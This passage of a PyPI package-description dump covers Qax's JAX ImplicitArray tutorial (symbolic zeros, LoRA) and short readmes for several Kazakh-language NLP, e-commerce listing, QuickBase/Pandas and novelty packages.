1: A symbolic zeroThe way you specify custom behavior with Qax is to subclass theqax.ImplicitArrayabstract class. One of the simplest things we could implement is a symbolic zero: A data type which represents an arbitrary tensor full of zeros without actually instantiating them on the GPU.classZeros(qax.ImplicitArray):default_dtype=jnp.float32defmaterialize(self):# self.shape and self.dtype will be# populated by the ImplicitArray constructorreturnjnp.zeros(self.shape,self.dtype)def__str__(self):returnf'Zeros({self.shape},{self.dtype})'The only mandatory method to implement when subclassingImplicitArrayismaterialize().materialize()specifies how to turn ourimplicitlyrepresented array into anexplicitone, i.e. a single dense JAX array. In the case ofZeros, we can just calljnp.zeros.Let's instantiate aZerosinstance to try it out:z=Zeros(shape=(2,3))ImplicitArrays aredataclasses, which by default have two keyword only attributes:shapeanddtype.By default JAX won't know how to use our new type. In order to use it in functions, we apply the@use_implicit_argsdecorator:@qax.use_implicit_argsdeff(x,y):return(x+y)[0,0]withwarnings.catch_warnings():warnings.simplefilter('always')print(f(z,jnp.ones(3)))/home/davis/src/qax/qax/implicit/implicit_array.py:303: UserWarning: Primitive add was not handled by class Zeros, so implicit args will be materialized.\n warnings.warn(f'Primitive {primitive.name} was not handled by class {vals[implicit_idx].__class__.__name__}, so implicit args will be materialized.')\n\n\n1.0The cool thing is thatfdoesn't need to have any idea that it will be called withImplicitArrayinstances, so we can use this with any pre-existing model. Right now this isn't much use, since allzis being materialized into a dense array as soon as it's needed for a JAX operation.To make ourZerosdo something productive, let's implement the fact that $x + 0$ is always equal to $x$. We do this using the@qax.primitive_handlerdecorator:defget_binop_result_shape_dtype(a,b):out_shape=jnp.broadcast_shapes(jnp.shape(a),jnp.shape(b))out_dtype=jnp.result_type(a.dtype,b.dtype)returnout_shape,out_dtype# primitive_handler() takes a string, JAX primitive, or a list of those types# strings are used to find the corresponding primitive from `jax.lax`@qax.primitive_handler('add')defmy_add_handler(primitive,a:Zeros,b):# Handlers will receive as arguments:# - primitive: a jax.core.Primitive instance (often can be ignored if the handler is just for one op)# Any number of arguments which are either JAX values or ImplicitArrays# Keyword arguments specifying parameters of the operation (e.g. axes for reduction operations)out_shape,out_dtype=get_binop_result_shape_dtype(a,b)ifisinstance(b,Zeros):# We can return further ImplicitArray instances if we wantreturnZeros(shape=out_shape,dtype=out_dtype)# Return b, possibly modifying its shape or dtypereturnjnp.broadcast_to(b,out_shape).astype(out_dtype)The type annotationa : Zerosis actually important, Qax usesPlumfor multiple dispatch. You can even use this to define how different subclasses of ImplicitArray should interact with each other.(For convenience, commutative binary ops like $+$ and $\\times$ will automatically get their argument order switched so that theImplicitArrayinstance comes first.)Now when we callf, we no longer see the materialization log message, since our add handler is skipping over ever instantiating the array of zeros:print(f(z,jnp.ones(3)))1.0Let's define a multiplication handler as well, since $x \\cdot 0 = 0$ for all $x$:@qax.primitive_handler('mul')defhandle_mul(primitive,a:Zeros,b):out_shape,out_dtype=get_binop_result_shape_dtype(a,b)returnZeros(shape=out_shape,dtype=out_dtype)@jax.jit@qax.use_implicit_argsdefg(x,y):return(1+x)*yprint(g(z,z))Zeros((2, 3), float32)The output ofuse_implicit_argsis a function which is compatible with all the usual JAX transformations such asjit,vmap,grad, etc.Even this simple implementation is enough to let us modify the behavior of models which were written without knowing about Qax. Let's try replacing all the biases in HuggingFace's GPT-2 with zeros:@qax.primitive_handler('broadcast_in_dim')defbroadcast(primitive,a:Zeros,*,shape,broadcast_dimensions):# The biases get broadcast in order to add them to the activations# so we need to handle that case# Sometimes the simplest thing to do is use jax.eval_shape# to figure out what shape to returnresult_shape=jax.eval_shape(partial(jax.lax.broadcast_in_dim,shape=shape,broadcast_dimensions=broadcast_dimensions),a.aval# ImplicitArray has an aval property which will get an abstract shape/dtype).shapereturnZeros(shape=result_shape,dtype=a.dtype)model,params=transformers.FlaxAutoModelForCausalLM.from_pretrained('gpt2',_do_init=False)inputs=jnp.arange(1,10)[None]# Helper function to switch all the biases# in the params out for some other valuedefreplace_biases(params,replacer):defmaybe_replace_val(path,val):ifval.ndim!=1:returnval# Skip layernormsifany(isinstance(p,jax.tree_util.DictKey)andp.key.startswith('ln')forpinpath):returnvalreturnreplacer(shape=val.shape,dtype=val.dtype)returnjax.tree_util.tree_map_with_path(maybe_replace_val,params)# Replace the biases with dense zero arrays:params_with_zeros=replace_biases(params,jnp.zeros)print('New bias:',params['transformer']['h']['0']['attn']['c_attn']['bias'])output=model(inputs,params=params_with_zeros).logitsprint('Last logit average:',jnp.mean(output[0,-1]))New bias: [ 0.48033914 -0.5254326 -0.42926455 ... 0.01257301 -0.04987717\n 0.00324764]\nLast logit average: -105.25595Now let's try replacing them with our symbolic zeros instead:params_with_zeros=replace_biases(params,Zeros)print('New bias:',params['transformer']['h']['0']['attn']['c_attn']['bias'])# In this case since we're calling the model directly, we need to# wrap it so we can pass params in a positional argument# This usually won't be an issue since the call to the model will# be inside a loss function or some other functionoutput=qax.use_implicit_args(model)(inputs,params=params_with_zeros).logitsprint('Last logit average:',jnp.mean(output[0,-1]))New bias: [ 0.48033914 -0.5254326 -0.42926455 ... 0.01257301 -0.04987717\n 0.00324764]\nLast logit average: -105.25595delmodeldelparamsWe got the same result, but using 0 FLOPs for adding the biases! If you really wanted to flesh out the behavior ofZeros, you could also add handlers defining its output for primitives such assin,cos, etc. Let's move on to something more interesting though.Example 2: LoRAIn this example we'll implementLoRAin just a few lines of code. Unlike theZerosexample from the previous section, ourImplicitArraysubclass will actually contain data this time. As such we'll need to implement flattening/unflattening logic, since allImplicitArraysubclasses are pytrees. This also means you can usetree_mapand friends to manipulate them.To add child pytrees to a subclass, we just add them as dataclass attributes. To add auxilary data, you can wrap a field withqax.aux_fieldwhich is just a wrapper arounddataclass.field.LoRA replaces a matrix $W$ with the matrix $W_0 + AB^T$, so we'll have three arrays as new attributes.@dataclassclassLoraMatrix(qax.ImplicitArray):\"\"\"Represent W + A B^T\"\"\"w:qax.ArrayValuea:qax.ArrayValueb:qax.ArrayValue# auxiliary data exampleis_array_happy:bool=qax.aux_field(default=True)def__post_init__(self):# If you need to do any validation, you can override the __post_init__ method# This example is purely for error checking, but you can also# add manipulations of the attributessuper().__post_init__()w_aval=jax.core.get_aval(self.w)a_aval=jax.core.get_aval(self.a)b_aval=jax.core.get_aval(self.b)assertw_aval.ndim==a_aval.ndim==b_aval.ndim==2asserta_aval.shape[1]==b_aval.shape[1]asserta_aval.shape[0]==w_aval.shape[0]assertb_aval.shape[0]==w_aval.shape[1]asserta_aval.dtype==b_aval.dtype==w_aval.dtypedefmaterialize(self):returnself.w+self.a@self.b.T@qax.primitive_handler('dot_general')deff(primitive,x:jax.Array,w:LoraMatrix,*,dimension_numbers,**kwargs):# For this example, we'll only handle the simple case of of x @ w, rather than# all possible dot_general invocations(lhs_contract,rhs_contract),(lhs_batch,rhs_batch)=dimension_numbers# This check just makes sure that all that's happening is a simple matmulifnot(len(w.shape)==2andlhs_contract==(x.ndim-1,)andrhs_contract==(0,)andlhs_batch==()andrhs_batch==()):# If we want to only partially handle a particular primitive,# we can fall back to the default logic by returning NotImplementedreturnNotImplementedkwargs={**kwargs,'dimension_numbers':dimension_numbers}# In order to defer to the default implementation of the primitive,# use the qax.default_handler helper:result=qax.default_handler(primitive,# pass the primitivex,w.w,# Any number of positional arguments,**kwargs# Then the primitive's keyword args)xa=qax.default_handler(primitive,x,w.a,**kwargs)xab=qax.default_handler(primitive,xa,w.b.T,**kwargs)result+=xabreturnresultdeflora_from_tree(tree,key,lora_dim=8):\"\"\"Helper function for replacing non-embedding weightmatrices in T5 with LoraMatrix instances.\"\"\"defiter_keys(key):whileTrue:key,k2=jax.random.split(key)yieldk2key_it=iter_keys(key)defmap_fn(path,val):ifval.ndim!=2:returnval# Skip embedding paramsifany(isinstance(p,jax.tree_util.DictKey)andp.key=='embedding'forpinpath):returnvala=jax.random.normal(next(key_it),(val.shape[0],lora_dim),val.dtype)b=jnp.zeros((val.shape[1],lora_dim),val.dtype)returnLoraMatrix(val,a,b)returnjax.tree_util.tree_map_with_path(map_fn,tree)Let's try it out on a T5 model:t5,params=transformers.FlaxAutoModelForSeq2SeqLM.from_pretrained('t5-small',_do_init=False)tokenizer=transformers.AutoTokenizer.from_pretrained('t5-small')encoder_inputs=jnp.asarray(tokenizer.encode('Some input'))[None]decoder_inputs=jnp.asarray([0]+tokenizer.encode('Some output'))[None]lora_params=lora_from_tree(params,jax.random.PRNGKey(1234))orig_output=t5(input_ids=encoder_inputs,decoder_input_ids=decoder_inputs,params=params).logitslora_output=qax.use_implicit_args(t5)(input_ids=encoder_inputs,decoder_input_ids=decoder_inputs,params=lora_params).logitsprint(jnp.max(jnp.abs(lora_output-orig_output)))0.0The LoRA result is identical to the execution of the unmodified network, and we didn't get any materialization warnings so we successfully made a LoRA forward pass without ever calculating $W + AB^T$!TrainingSo far we haven't looked at how to train a model when using Qax. The main thing to understand is that you should applyqax.use_implicit_argsfirst,thendifferentiate the resulting function.use_implicit_argstransforms the function into one which goes from pytrees to pytrees, so all the standard JAX autodiff machinery will work.If you need to update only a subset of the elements of an ImplicitArray instance (e.g. onlyaandbfor LoRA), Qax providesqax.utils.freeze_keysto make this easier. Here's an end-to-end example training T5 to memorize the input/output pair from above:optimizer=optax.adam(3e-4)# freeze_keys_in_optimizer takes an optax optimizer, the ImplicitArray subclass to freeze for,# and an iterable of the keys to be frozenoptimizer=qax.utils.freeze_keys(optimizer,LoraMatrix,['w'])# We're only using a single example so we'll just close over the training data# There are no code changes from an ordinary training loop other than decorating# loss_fn with @use_implicit_args@qax.use_implicit_argsdefloss_fn(params):decoder_ids=decoder_inputs[:,:-1]targets=decoder_inputs[:,1:]logits=t5(input_ids=encoder_inputs,decoder_input_ids=decoder_ids,params=params).logitslogprobs=jax.nn.log_softmax(logits)target_logprobs=jnp.take_along_axis(logprobs,targets[:,:,None],axis=-1)loss=-jnp.sum(target_logprobs)returnlossgrad_fn=jax.value_and_grad(loss_fn)@jax.jitdefupdate(params,opt_state):loss,grads=grad_fn(params)updates,new_opt_state=optimizer.update(grads,opt_state,params=params)new_params=optax.apply_updates(updates,params)returnloss,new_params,new_opt_stateopt_state=optimizer.init(lora_params)forstepinrange(20):loss,lora_params,opt_state=update(lora_params,opt_state)print(f'{step}.{loss:.3f}')0. 8.882\n1. 5.375\n2. 3.787\n3. 2.524\n4. 1.491\n5. 0.723\n6. 0.242\n7. 0.062\n8. 0.022\n9. 0.013\n10. 0.011\n11. 0.009\n12. 0.008\n13. 0.007\n14. 0.007\n15. 0.006\n16. 0.005\n17. 0.004\n18. 0.003\n19. 0.003That's all you need to know to get started using Qax!Example 3: NestingQax supports arbitrary nesting ofImplicitArrayinstances without. Here's a quick demo combining the previous two examples:@qax.use_implicit_argsdefg(w,x):returnjnp.sum(x@w)w=jnp.ones((3,5))x=jnp.arange(3,dtype=jnp.float32)lora_with_symbolic_zero=LoraMatrix(w=w,a=Zeros(shape=(w.shape[0],6)),b=Zeros(shape=(w.shape[1],6)))print(f'Original:{g(w,x)}')withwarnings.catch_warnings():warnings.simplefilter('always')print(f'With lora:{g(lora_with_symbolic_zero,x)}')Original: 15.0\nWith lora: 15.0\n\n\nUserWarning: Primitive dot_general was not handled by class Zeros, so implicit args will be materialized.\n warnings.warn(f'Primitive {primitive.name} was not handled by class {vals[implicit_idx].__class__.__name__}, so implicit args will be materialized.')\nUserWarning: Primitive transpose was not handled by class Zeros, so implicit args will be materialized.\n warnings.warn(f'Primitive {primitive.name} was not handled by class {vals[implicit_idx].__class__.__name__}, so implicit args will be materialized.')If we wanted we could write adot_generalhandler to avoid the materialization as well, but the main point is just to illustrate that it's easy to mix and match differentImplicitArraysubclasses. A more useful example might be using a symbolic zero as the offset for a quantization datatypes which expects both an offset and a scale.Other examplesHere'san example of using Qax to implement a 4-bit quantized matrix representation."} +{"package": "qaz", "pacakge-description": "No description available on PyPI."} +{"package": "qazaq-transliterator", "pacakge-description": "Python Qazaq TransliteratorTransliteration of the old Kazakh alphabet into a new one. Inspired bybarseghyanartur/transliteratePrerequisitesPython >=2.7, >=3.4, PyPyInstallationInstall with latest stable version from PyPI:pipinstallqazaq-transliteratorUsagefromqazaq_transliteratorimporttranslittext=\"\u049a\u0430\u0437\u0430\u049b\u0441\u0442\u0430\u043d \u0420\u0435\u0441\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0441\u044b \u2014 \u0428\u044b\u0493\u044b\u0441 \u0415\u0443\u0440\u043e\u043f\u0430 \u043c\u0435\u043d \u041e\u0440\u0442\u0430\u043b\u044b\u049b \u0410\u0437\u0438\u044f\u0434\u0430 \u043e\u0440\u043d\u0430\u043b\u0430\u0441\u049b\u0430\u043d \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442.\"print(translit(text))# Qazaqstan Respublikasy \u2014 \u015ey\u011fys Europa men Ortalyq Aziiada ornalasqan memleket.Testingpythonsetup.pytestChangelogPlease seeCHANGELOGfor more information on what has changed recently.ContributingPlease seeCONTRIBUTINGfor details.SecurityIf you discover any security related issues, please emailaltynbek.kazezov.97@gmail.cominstead of using the issue tracker.CreditsAltynbekAll ContributorsLicenseThe MIT License (MIT). Please seeLicense Filefor more information."} +{"package": "qazc", "pacakge-description": "No description available on PyPI."} +{"package": "qaznltk", "pacakge-description": "QazNLTK: a package for working with Kazakh language text processing.What is it?QazNLTKprovides developers with a fast and convenient tool for processing text in the Kazakh language. Tailored for the unique linguistic characteristics of Kazakh, this library offers a comprehensive set of tools for natural language processing, like: tokenization, sentence segmentation, evaluation similarity score and tranliteration of kazakh language cyrillic-latin.Table of ContentsMain FeaturesWhere to get itDependenciesLicenseGetting HelpContributing to QazNLTKMain FeaturesHere are just a few of the things that qaznltk does well:Kazakh language Text Tokenizing by keyword frequencies:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")tokens=qn.tokenize(text)print(tokens)# Input: \u0411\u0456\u0437\u0434\u0456\u04a3 \u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437 \u04af\u043b\u043a\u0435\u043d \u04e9\u0437\u0435\u043d \u0456\u0441\u043f\u0435\u0442\u0442\u0456. \u0421\u0456\u0437\u0434\u0456\u04a3 \u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3 \u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d \u0436\u0435\u04a3\u0456\u043b \u04e9\u0442\u0456\u043f, \u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442 \u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435 \u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d \u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439, \u0431\u0430\u049b\u044b\u0442 \u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430 \u0436\u0435\u0442\u0443\u0456\u043d \u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d!# Output: [('\u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437', 1), ('\u04af\u043b\u043a\u0435\u043d', 1), ('\u04e9\u0437\u0435\u043d', 1), ('\u0456\u0441\u043f\u0435\u0442\u0442\u0456', 1), ('\u0441\u0456\u0437\u0434\u0456\u04a3', 1), ('\u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3', 1), ('\u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d', 1), ('\u0436\u0435\u04a3\u0456\u043b', 1), ('\u04e9\u0442\u0456\u043f', 1), ('\u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442', 1), ('\u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435', 1), ('\u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d', 1), ('\u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439', 1), ('\u0431\u0430\u049b\u044b\u0442', 1), ('\u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430', 1), ('\u0436\u0435\u0442\u0443\u0456\u043d', 1), ('\u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d', 1)]Kazakh language Text Segmentation into sentences:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")sent_tokens=qn.sent_tokenize(text)print(sent_tokens)# Input: \u0411\u0456\u0437\u0434\u0456\u04a3 \u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437 \u04af\u043b\u043a\u0435\u043d \u04e9\u0437\u0435\u043d \u0456\u0441\u043f\u0435\u0442\u0442\u0456. \u0421\u0456\u0437\u0434\u0456\u04a3 \u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3 \u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d \u0436\u0435\u04a3\u0456\u043b \u04e9\u0442\u0456\u043f, \u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442 \u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435 \u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d \u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439, \u0431\u0430\u049b\u044b\u0442 \u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430 \u0436\u0435\u0442\u0443\u0456\u043d \u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d!# Output: ['\u0411\u0456\u0437\u0434\u0456\u04a3 \u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437 \u04af\u043b\u043a\u0435\u043d \u04e9\u0437\u0435\u043d \u0456\u0441\u043f\u0435\u0442\u0442\u0456.', '\u0421\u0456\u0437\u0434\u0456\u04a3 \u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3 \u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d \u0436\u0435\u04a3\u0456\u043b \u04e9\u0442\u0456\u043f, \u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442 \u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435 \u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d \u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439, \u0431\u0430\u049b\u044b\u0442 \u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430 \u0436\u0435\u0442\u0443\u0456\u043d \u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d!']Evaluate Difference score between 2 text:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()textA=input(\"Enter text A: \")textB=input(\"Enter text B: \")similarity_score=qn.calc_similarity(textA,textB)print(similarity_score)# Input: textA = \"\u0415\u04a3\u0431\u0435\u0433\u0456\u043d\u0435 \u049b\u0430\u0440\u0430\u0439 \u2014 \u049b\u04b1\u0440\u043c\u0435\u0442, \u0416\u0430\u0441\u044b\u043d\u0430 \u049b\u0430\u0440\u0430\u0439 \u2014 \u0456\u0437\u0435\u0442.\", textB = \"\u0415\u04a3\u0431\u0435\u0433\u0456\u043d\u0435 \u049b\u0430\u0440\u0430\u0439 \u0442\u0430\u0431\u044b\u0441\u044b, \u0415\u0440\u043b\u0456\u0433\u0456\u043d\u0435 \u049b\u0430\u0440\u0430\u0439 \u0434\u0430\u0431\u044b\u0441\u044b.\"# Output: 0.2222222222222222Convert Kazakh language Text from Cyrillic to Latin using ISO-9 Standard:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")latin_text=qn.convert2latin(text)print(latin_text)# Input: \u0411\u04af\u0433\u0456\u043d \u049b\u0430\u043d\u0434\u0430\u0439 \u043a\u0435\u0440\u0435\u043c\u0435\u0442 \u043a\u04af\u043d!# Output: B\u00f9g\u00ecn k\u0326andaj keremet k\u00f9n!Convert Kazakh language Text from Latin to Cyrillic using ISO-9 Standard:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")cyrillic_text=qn.convert2cyrillic(text)print(cyrillic_text)# Input: B\u00f9g\u00ecn k\u0326andaj keremet k\u00f9n!# Output: \u0411\u04af\u0433\u0456\u043d \u049b\u0430\u043d\u0434\u0430\u0439 \u043a\u0435\u0440\u0435\u043c\u0435\u0442 \u043a\u04af\u043d!Sentiment Analysis of Kazakh language text [negative: -1,neutral: 0,positive: 1]:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")sentimize_score=qnltk.sentimize(text)print(sentimize_score)# Input: \u0411\u04b1\u043b \u043c\u0430\u049b\u0430\u043b\u0430 \u04e9\u0442\u0435 \u043d\u0430\u0448\u0430\u0440 \u0436\u0430\u0437\u044b\u043b\u0493\u0430\u043d.# Output: -1 (negative)Converting any numberNinto kazakh language number words [N <= 10^31]:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()n=int(input())print(qnltk.num2word(n))# Input: N = 1465# Output: \u0431\u0456\u0440 \u043c\u044b\u04a3 \u0442\u04e9\u0440\u0442 \u0436\u04af\u0437 \u0430\u043b\u043f\u044b\u0441 \u0431\u0435\u0441Test Samples:https://vk.com/club121755042Where to get itThe source code is currently hosted on GitHub at:https://github.com/silvermete0r/QazNLTK.gitBinary installers for the latest released version are available at thePython\nPackage Index (PyPI).pipinstallqaznltkThe list of changes to pandas between each release can be foundhere. For full\ndetails, see the commit logs athttps://github.com/pandas-dev/pandas.DependenciesPackage was developed on built-in python functions;LicenseGetting Help\ud83d\udce7supwithproject@gmail.comContributing to qaznltkAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome.Go to Top"} +{"package": "qazse", "pacakge-description": "\u81ea\u5df1python\u9879\u76ee\u5e38\u7528\u5f97\u5de5\u5177\u5305"} +{"package": "qazwsx", "pacakge-description": "AboutAn Cross-Border E-Commerce Mover \u8de8\u5883\u7535\u5546\u642c\u8fd0\u5de5GoalMaking cross-border business easy worldwidecross-border-moverA Cross-border E-commerce MoverdesginFeaturesscrapetranslateextra-batch-images with sdwebuiapiuse pandas auto fill amazon listing excelPlanned Features:title generate by AIInstallpython -m pip install cross-border-moverUsageopen .\\XXBand.xlsm with Excel firstform cross-border-mover import Mover\n\n# move from taobao to amazon\ndf_amazon = Mover.fromTaobao(url).toAmazon()\n\n# move from pinduoduo to amazon\ndf_amazon = Mover.fromPDD(url).toAmazon()\n\n# move from 1688 to amazon\ndf_amazon = Mover.from1688(url).toAmazon()\n\n# move from taobao to Wish\ndf_wish = Mover.fromTaobao(url).toWish()\n\n# move from pinduoduo to Wish\ndf_wish = Mover.fromPDD(url).toAmazon()\n\n# move from 1688 to Wish\ndf_wish = Mover.from1688(url).toWish()"} +{"package": "qazxsw", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qb", "pacakge-description": "qb \u2013 SQL query builderDevelopment in progress."} +{"package": "qbabel", "pacakge-description": "No description available on PyPI."} +{"package": "qbackup", "pacakge-description": "QBackupCross-Platform multi-purpose backup utility"} +{"package": "qball", "pacakge-description": "UNKNOWN"} +{"package": "qball-lang", "pacakge-description": "QBallQBall is a high-level interpreted language written in Python. It is object oriented and has an easy to learn and use syntax. The following is an example of outputting \"Hello, world!\" into the consoleout \"Hello, world!\";It also has any easy function decleration system$ This is a single line comment\n((This is a\nmultiline comment))\n$ This declares a function outarg that takes an argument a\n_outarg a;\n out a;\nend\noutarg \"Hello, world!\";DocsEverything you need to know is in documentation.txtContributeGo here to contribute:https://repl.it/@qballlang/QBallChanges are commited 8:00 PM EST every day I canTrello boardThe official Trello board:https://trello.com/b/cJM6HsR3/qball"} +{"package": "qbandas", "pacakge-description": "qBandasqBandas (QuickBase + Pandas) is a Python package designed to effeciently\ntransfer tabular data between QuickBase applications and the popular Python data\nhandling package Pandas. If you are new to Pandas, you can read more about ithere.The advantages of this approach over a QuickBase pipeline are:Access to databases through Python packages.Greater control over features like error logging, data processing,\nautomated reporting, and scheduling.Significantly less performance impact on your QuickBase application.Access tabular data from local sources.Easily pull data from a QuickBase app into Python.The disadvantages of this approach compared to a pipeline are:Requires some knowledge of Python and Pandas.Pleaseread the docsbefore\nusing this package.Installationpython3-mpipinstall-UpipqbandasYou can now use it through import.importqbandas"} +{"package": "qbane", "pacakge-description": "\"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!\" -Bane (Dark Knight).///` `.--::::::---.`` `///. \n h-.-s+++/--
.---/+o++s:.-h \n ++..-. `:../s \n -+ydm-..: :..-dmho:` \n :odmNNNNs..-. `:..+MNNNmmy/. `\n .odmNNNNMMMN`..: -..`mMMMMNNNNmy: \n +mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy. \n .yNNNNMMMMMMMMMd` `-
```````..-` `yMMMMMMMMMMNNNd: \n -dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo \n :mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs` \n /mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy` \n :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy` \n -mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo \n hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm- \n -NNNNNMMMMMMMMMMMMMMMMMM-..: -
NMMMMMMMMMMMMMMMMMMNNNNs \n oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm \n :dNNNNNNMMMMMMMMMMMMMMMMMd
-``````
.hMMMMMMMMMMMMMMMMMMMNNNNNs. \n .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `\n `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `\n +y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N` \n m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `\n /d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m` \n h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/ \n m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so \n d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s \n .h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h \n -y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d \n :s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `\n /o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `\n ++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `\n -h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `\n s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y- \n .h `:`/hNMMMMMMd+: -::
s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y \n o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h. \n `d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s \n o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h. \n `d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s \n o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d. \n `d .:. -sy .. .o--+ -.+-.`.-/
:/
/--`.-+.: +--o- `/d+``--`:s \n s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h. \n .h -:`/.///`/..`:-.:`



.
`: /--../ //:o.:.-y \n s: -o/::/:--.-.-.: : /`:.---/::+. y- \n `h. ``/. `/ ` -.:```

..` ```: / ` :` ./. +o \n .y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s \n .y- -.:```: :/::o+/::/ : ``: : `+o \n `s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/ \n :s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o. \n `/o:+..+`.` -.://+
+--//:-+
////`: `../-.ss- \n /h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y- \n o+``.-+-.::
o//o- /--::--+ .o//s
:/.-//:``:s \n -o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o: \n -o++oy.: .- /`o::oo:-+-/ -- /o++++o: \n `os .. /..//../ ..` `s: \n `o+. `:`:-.-. `.++- \n `/+/.` `. .` `-++:` \n `:+++/:-
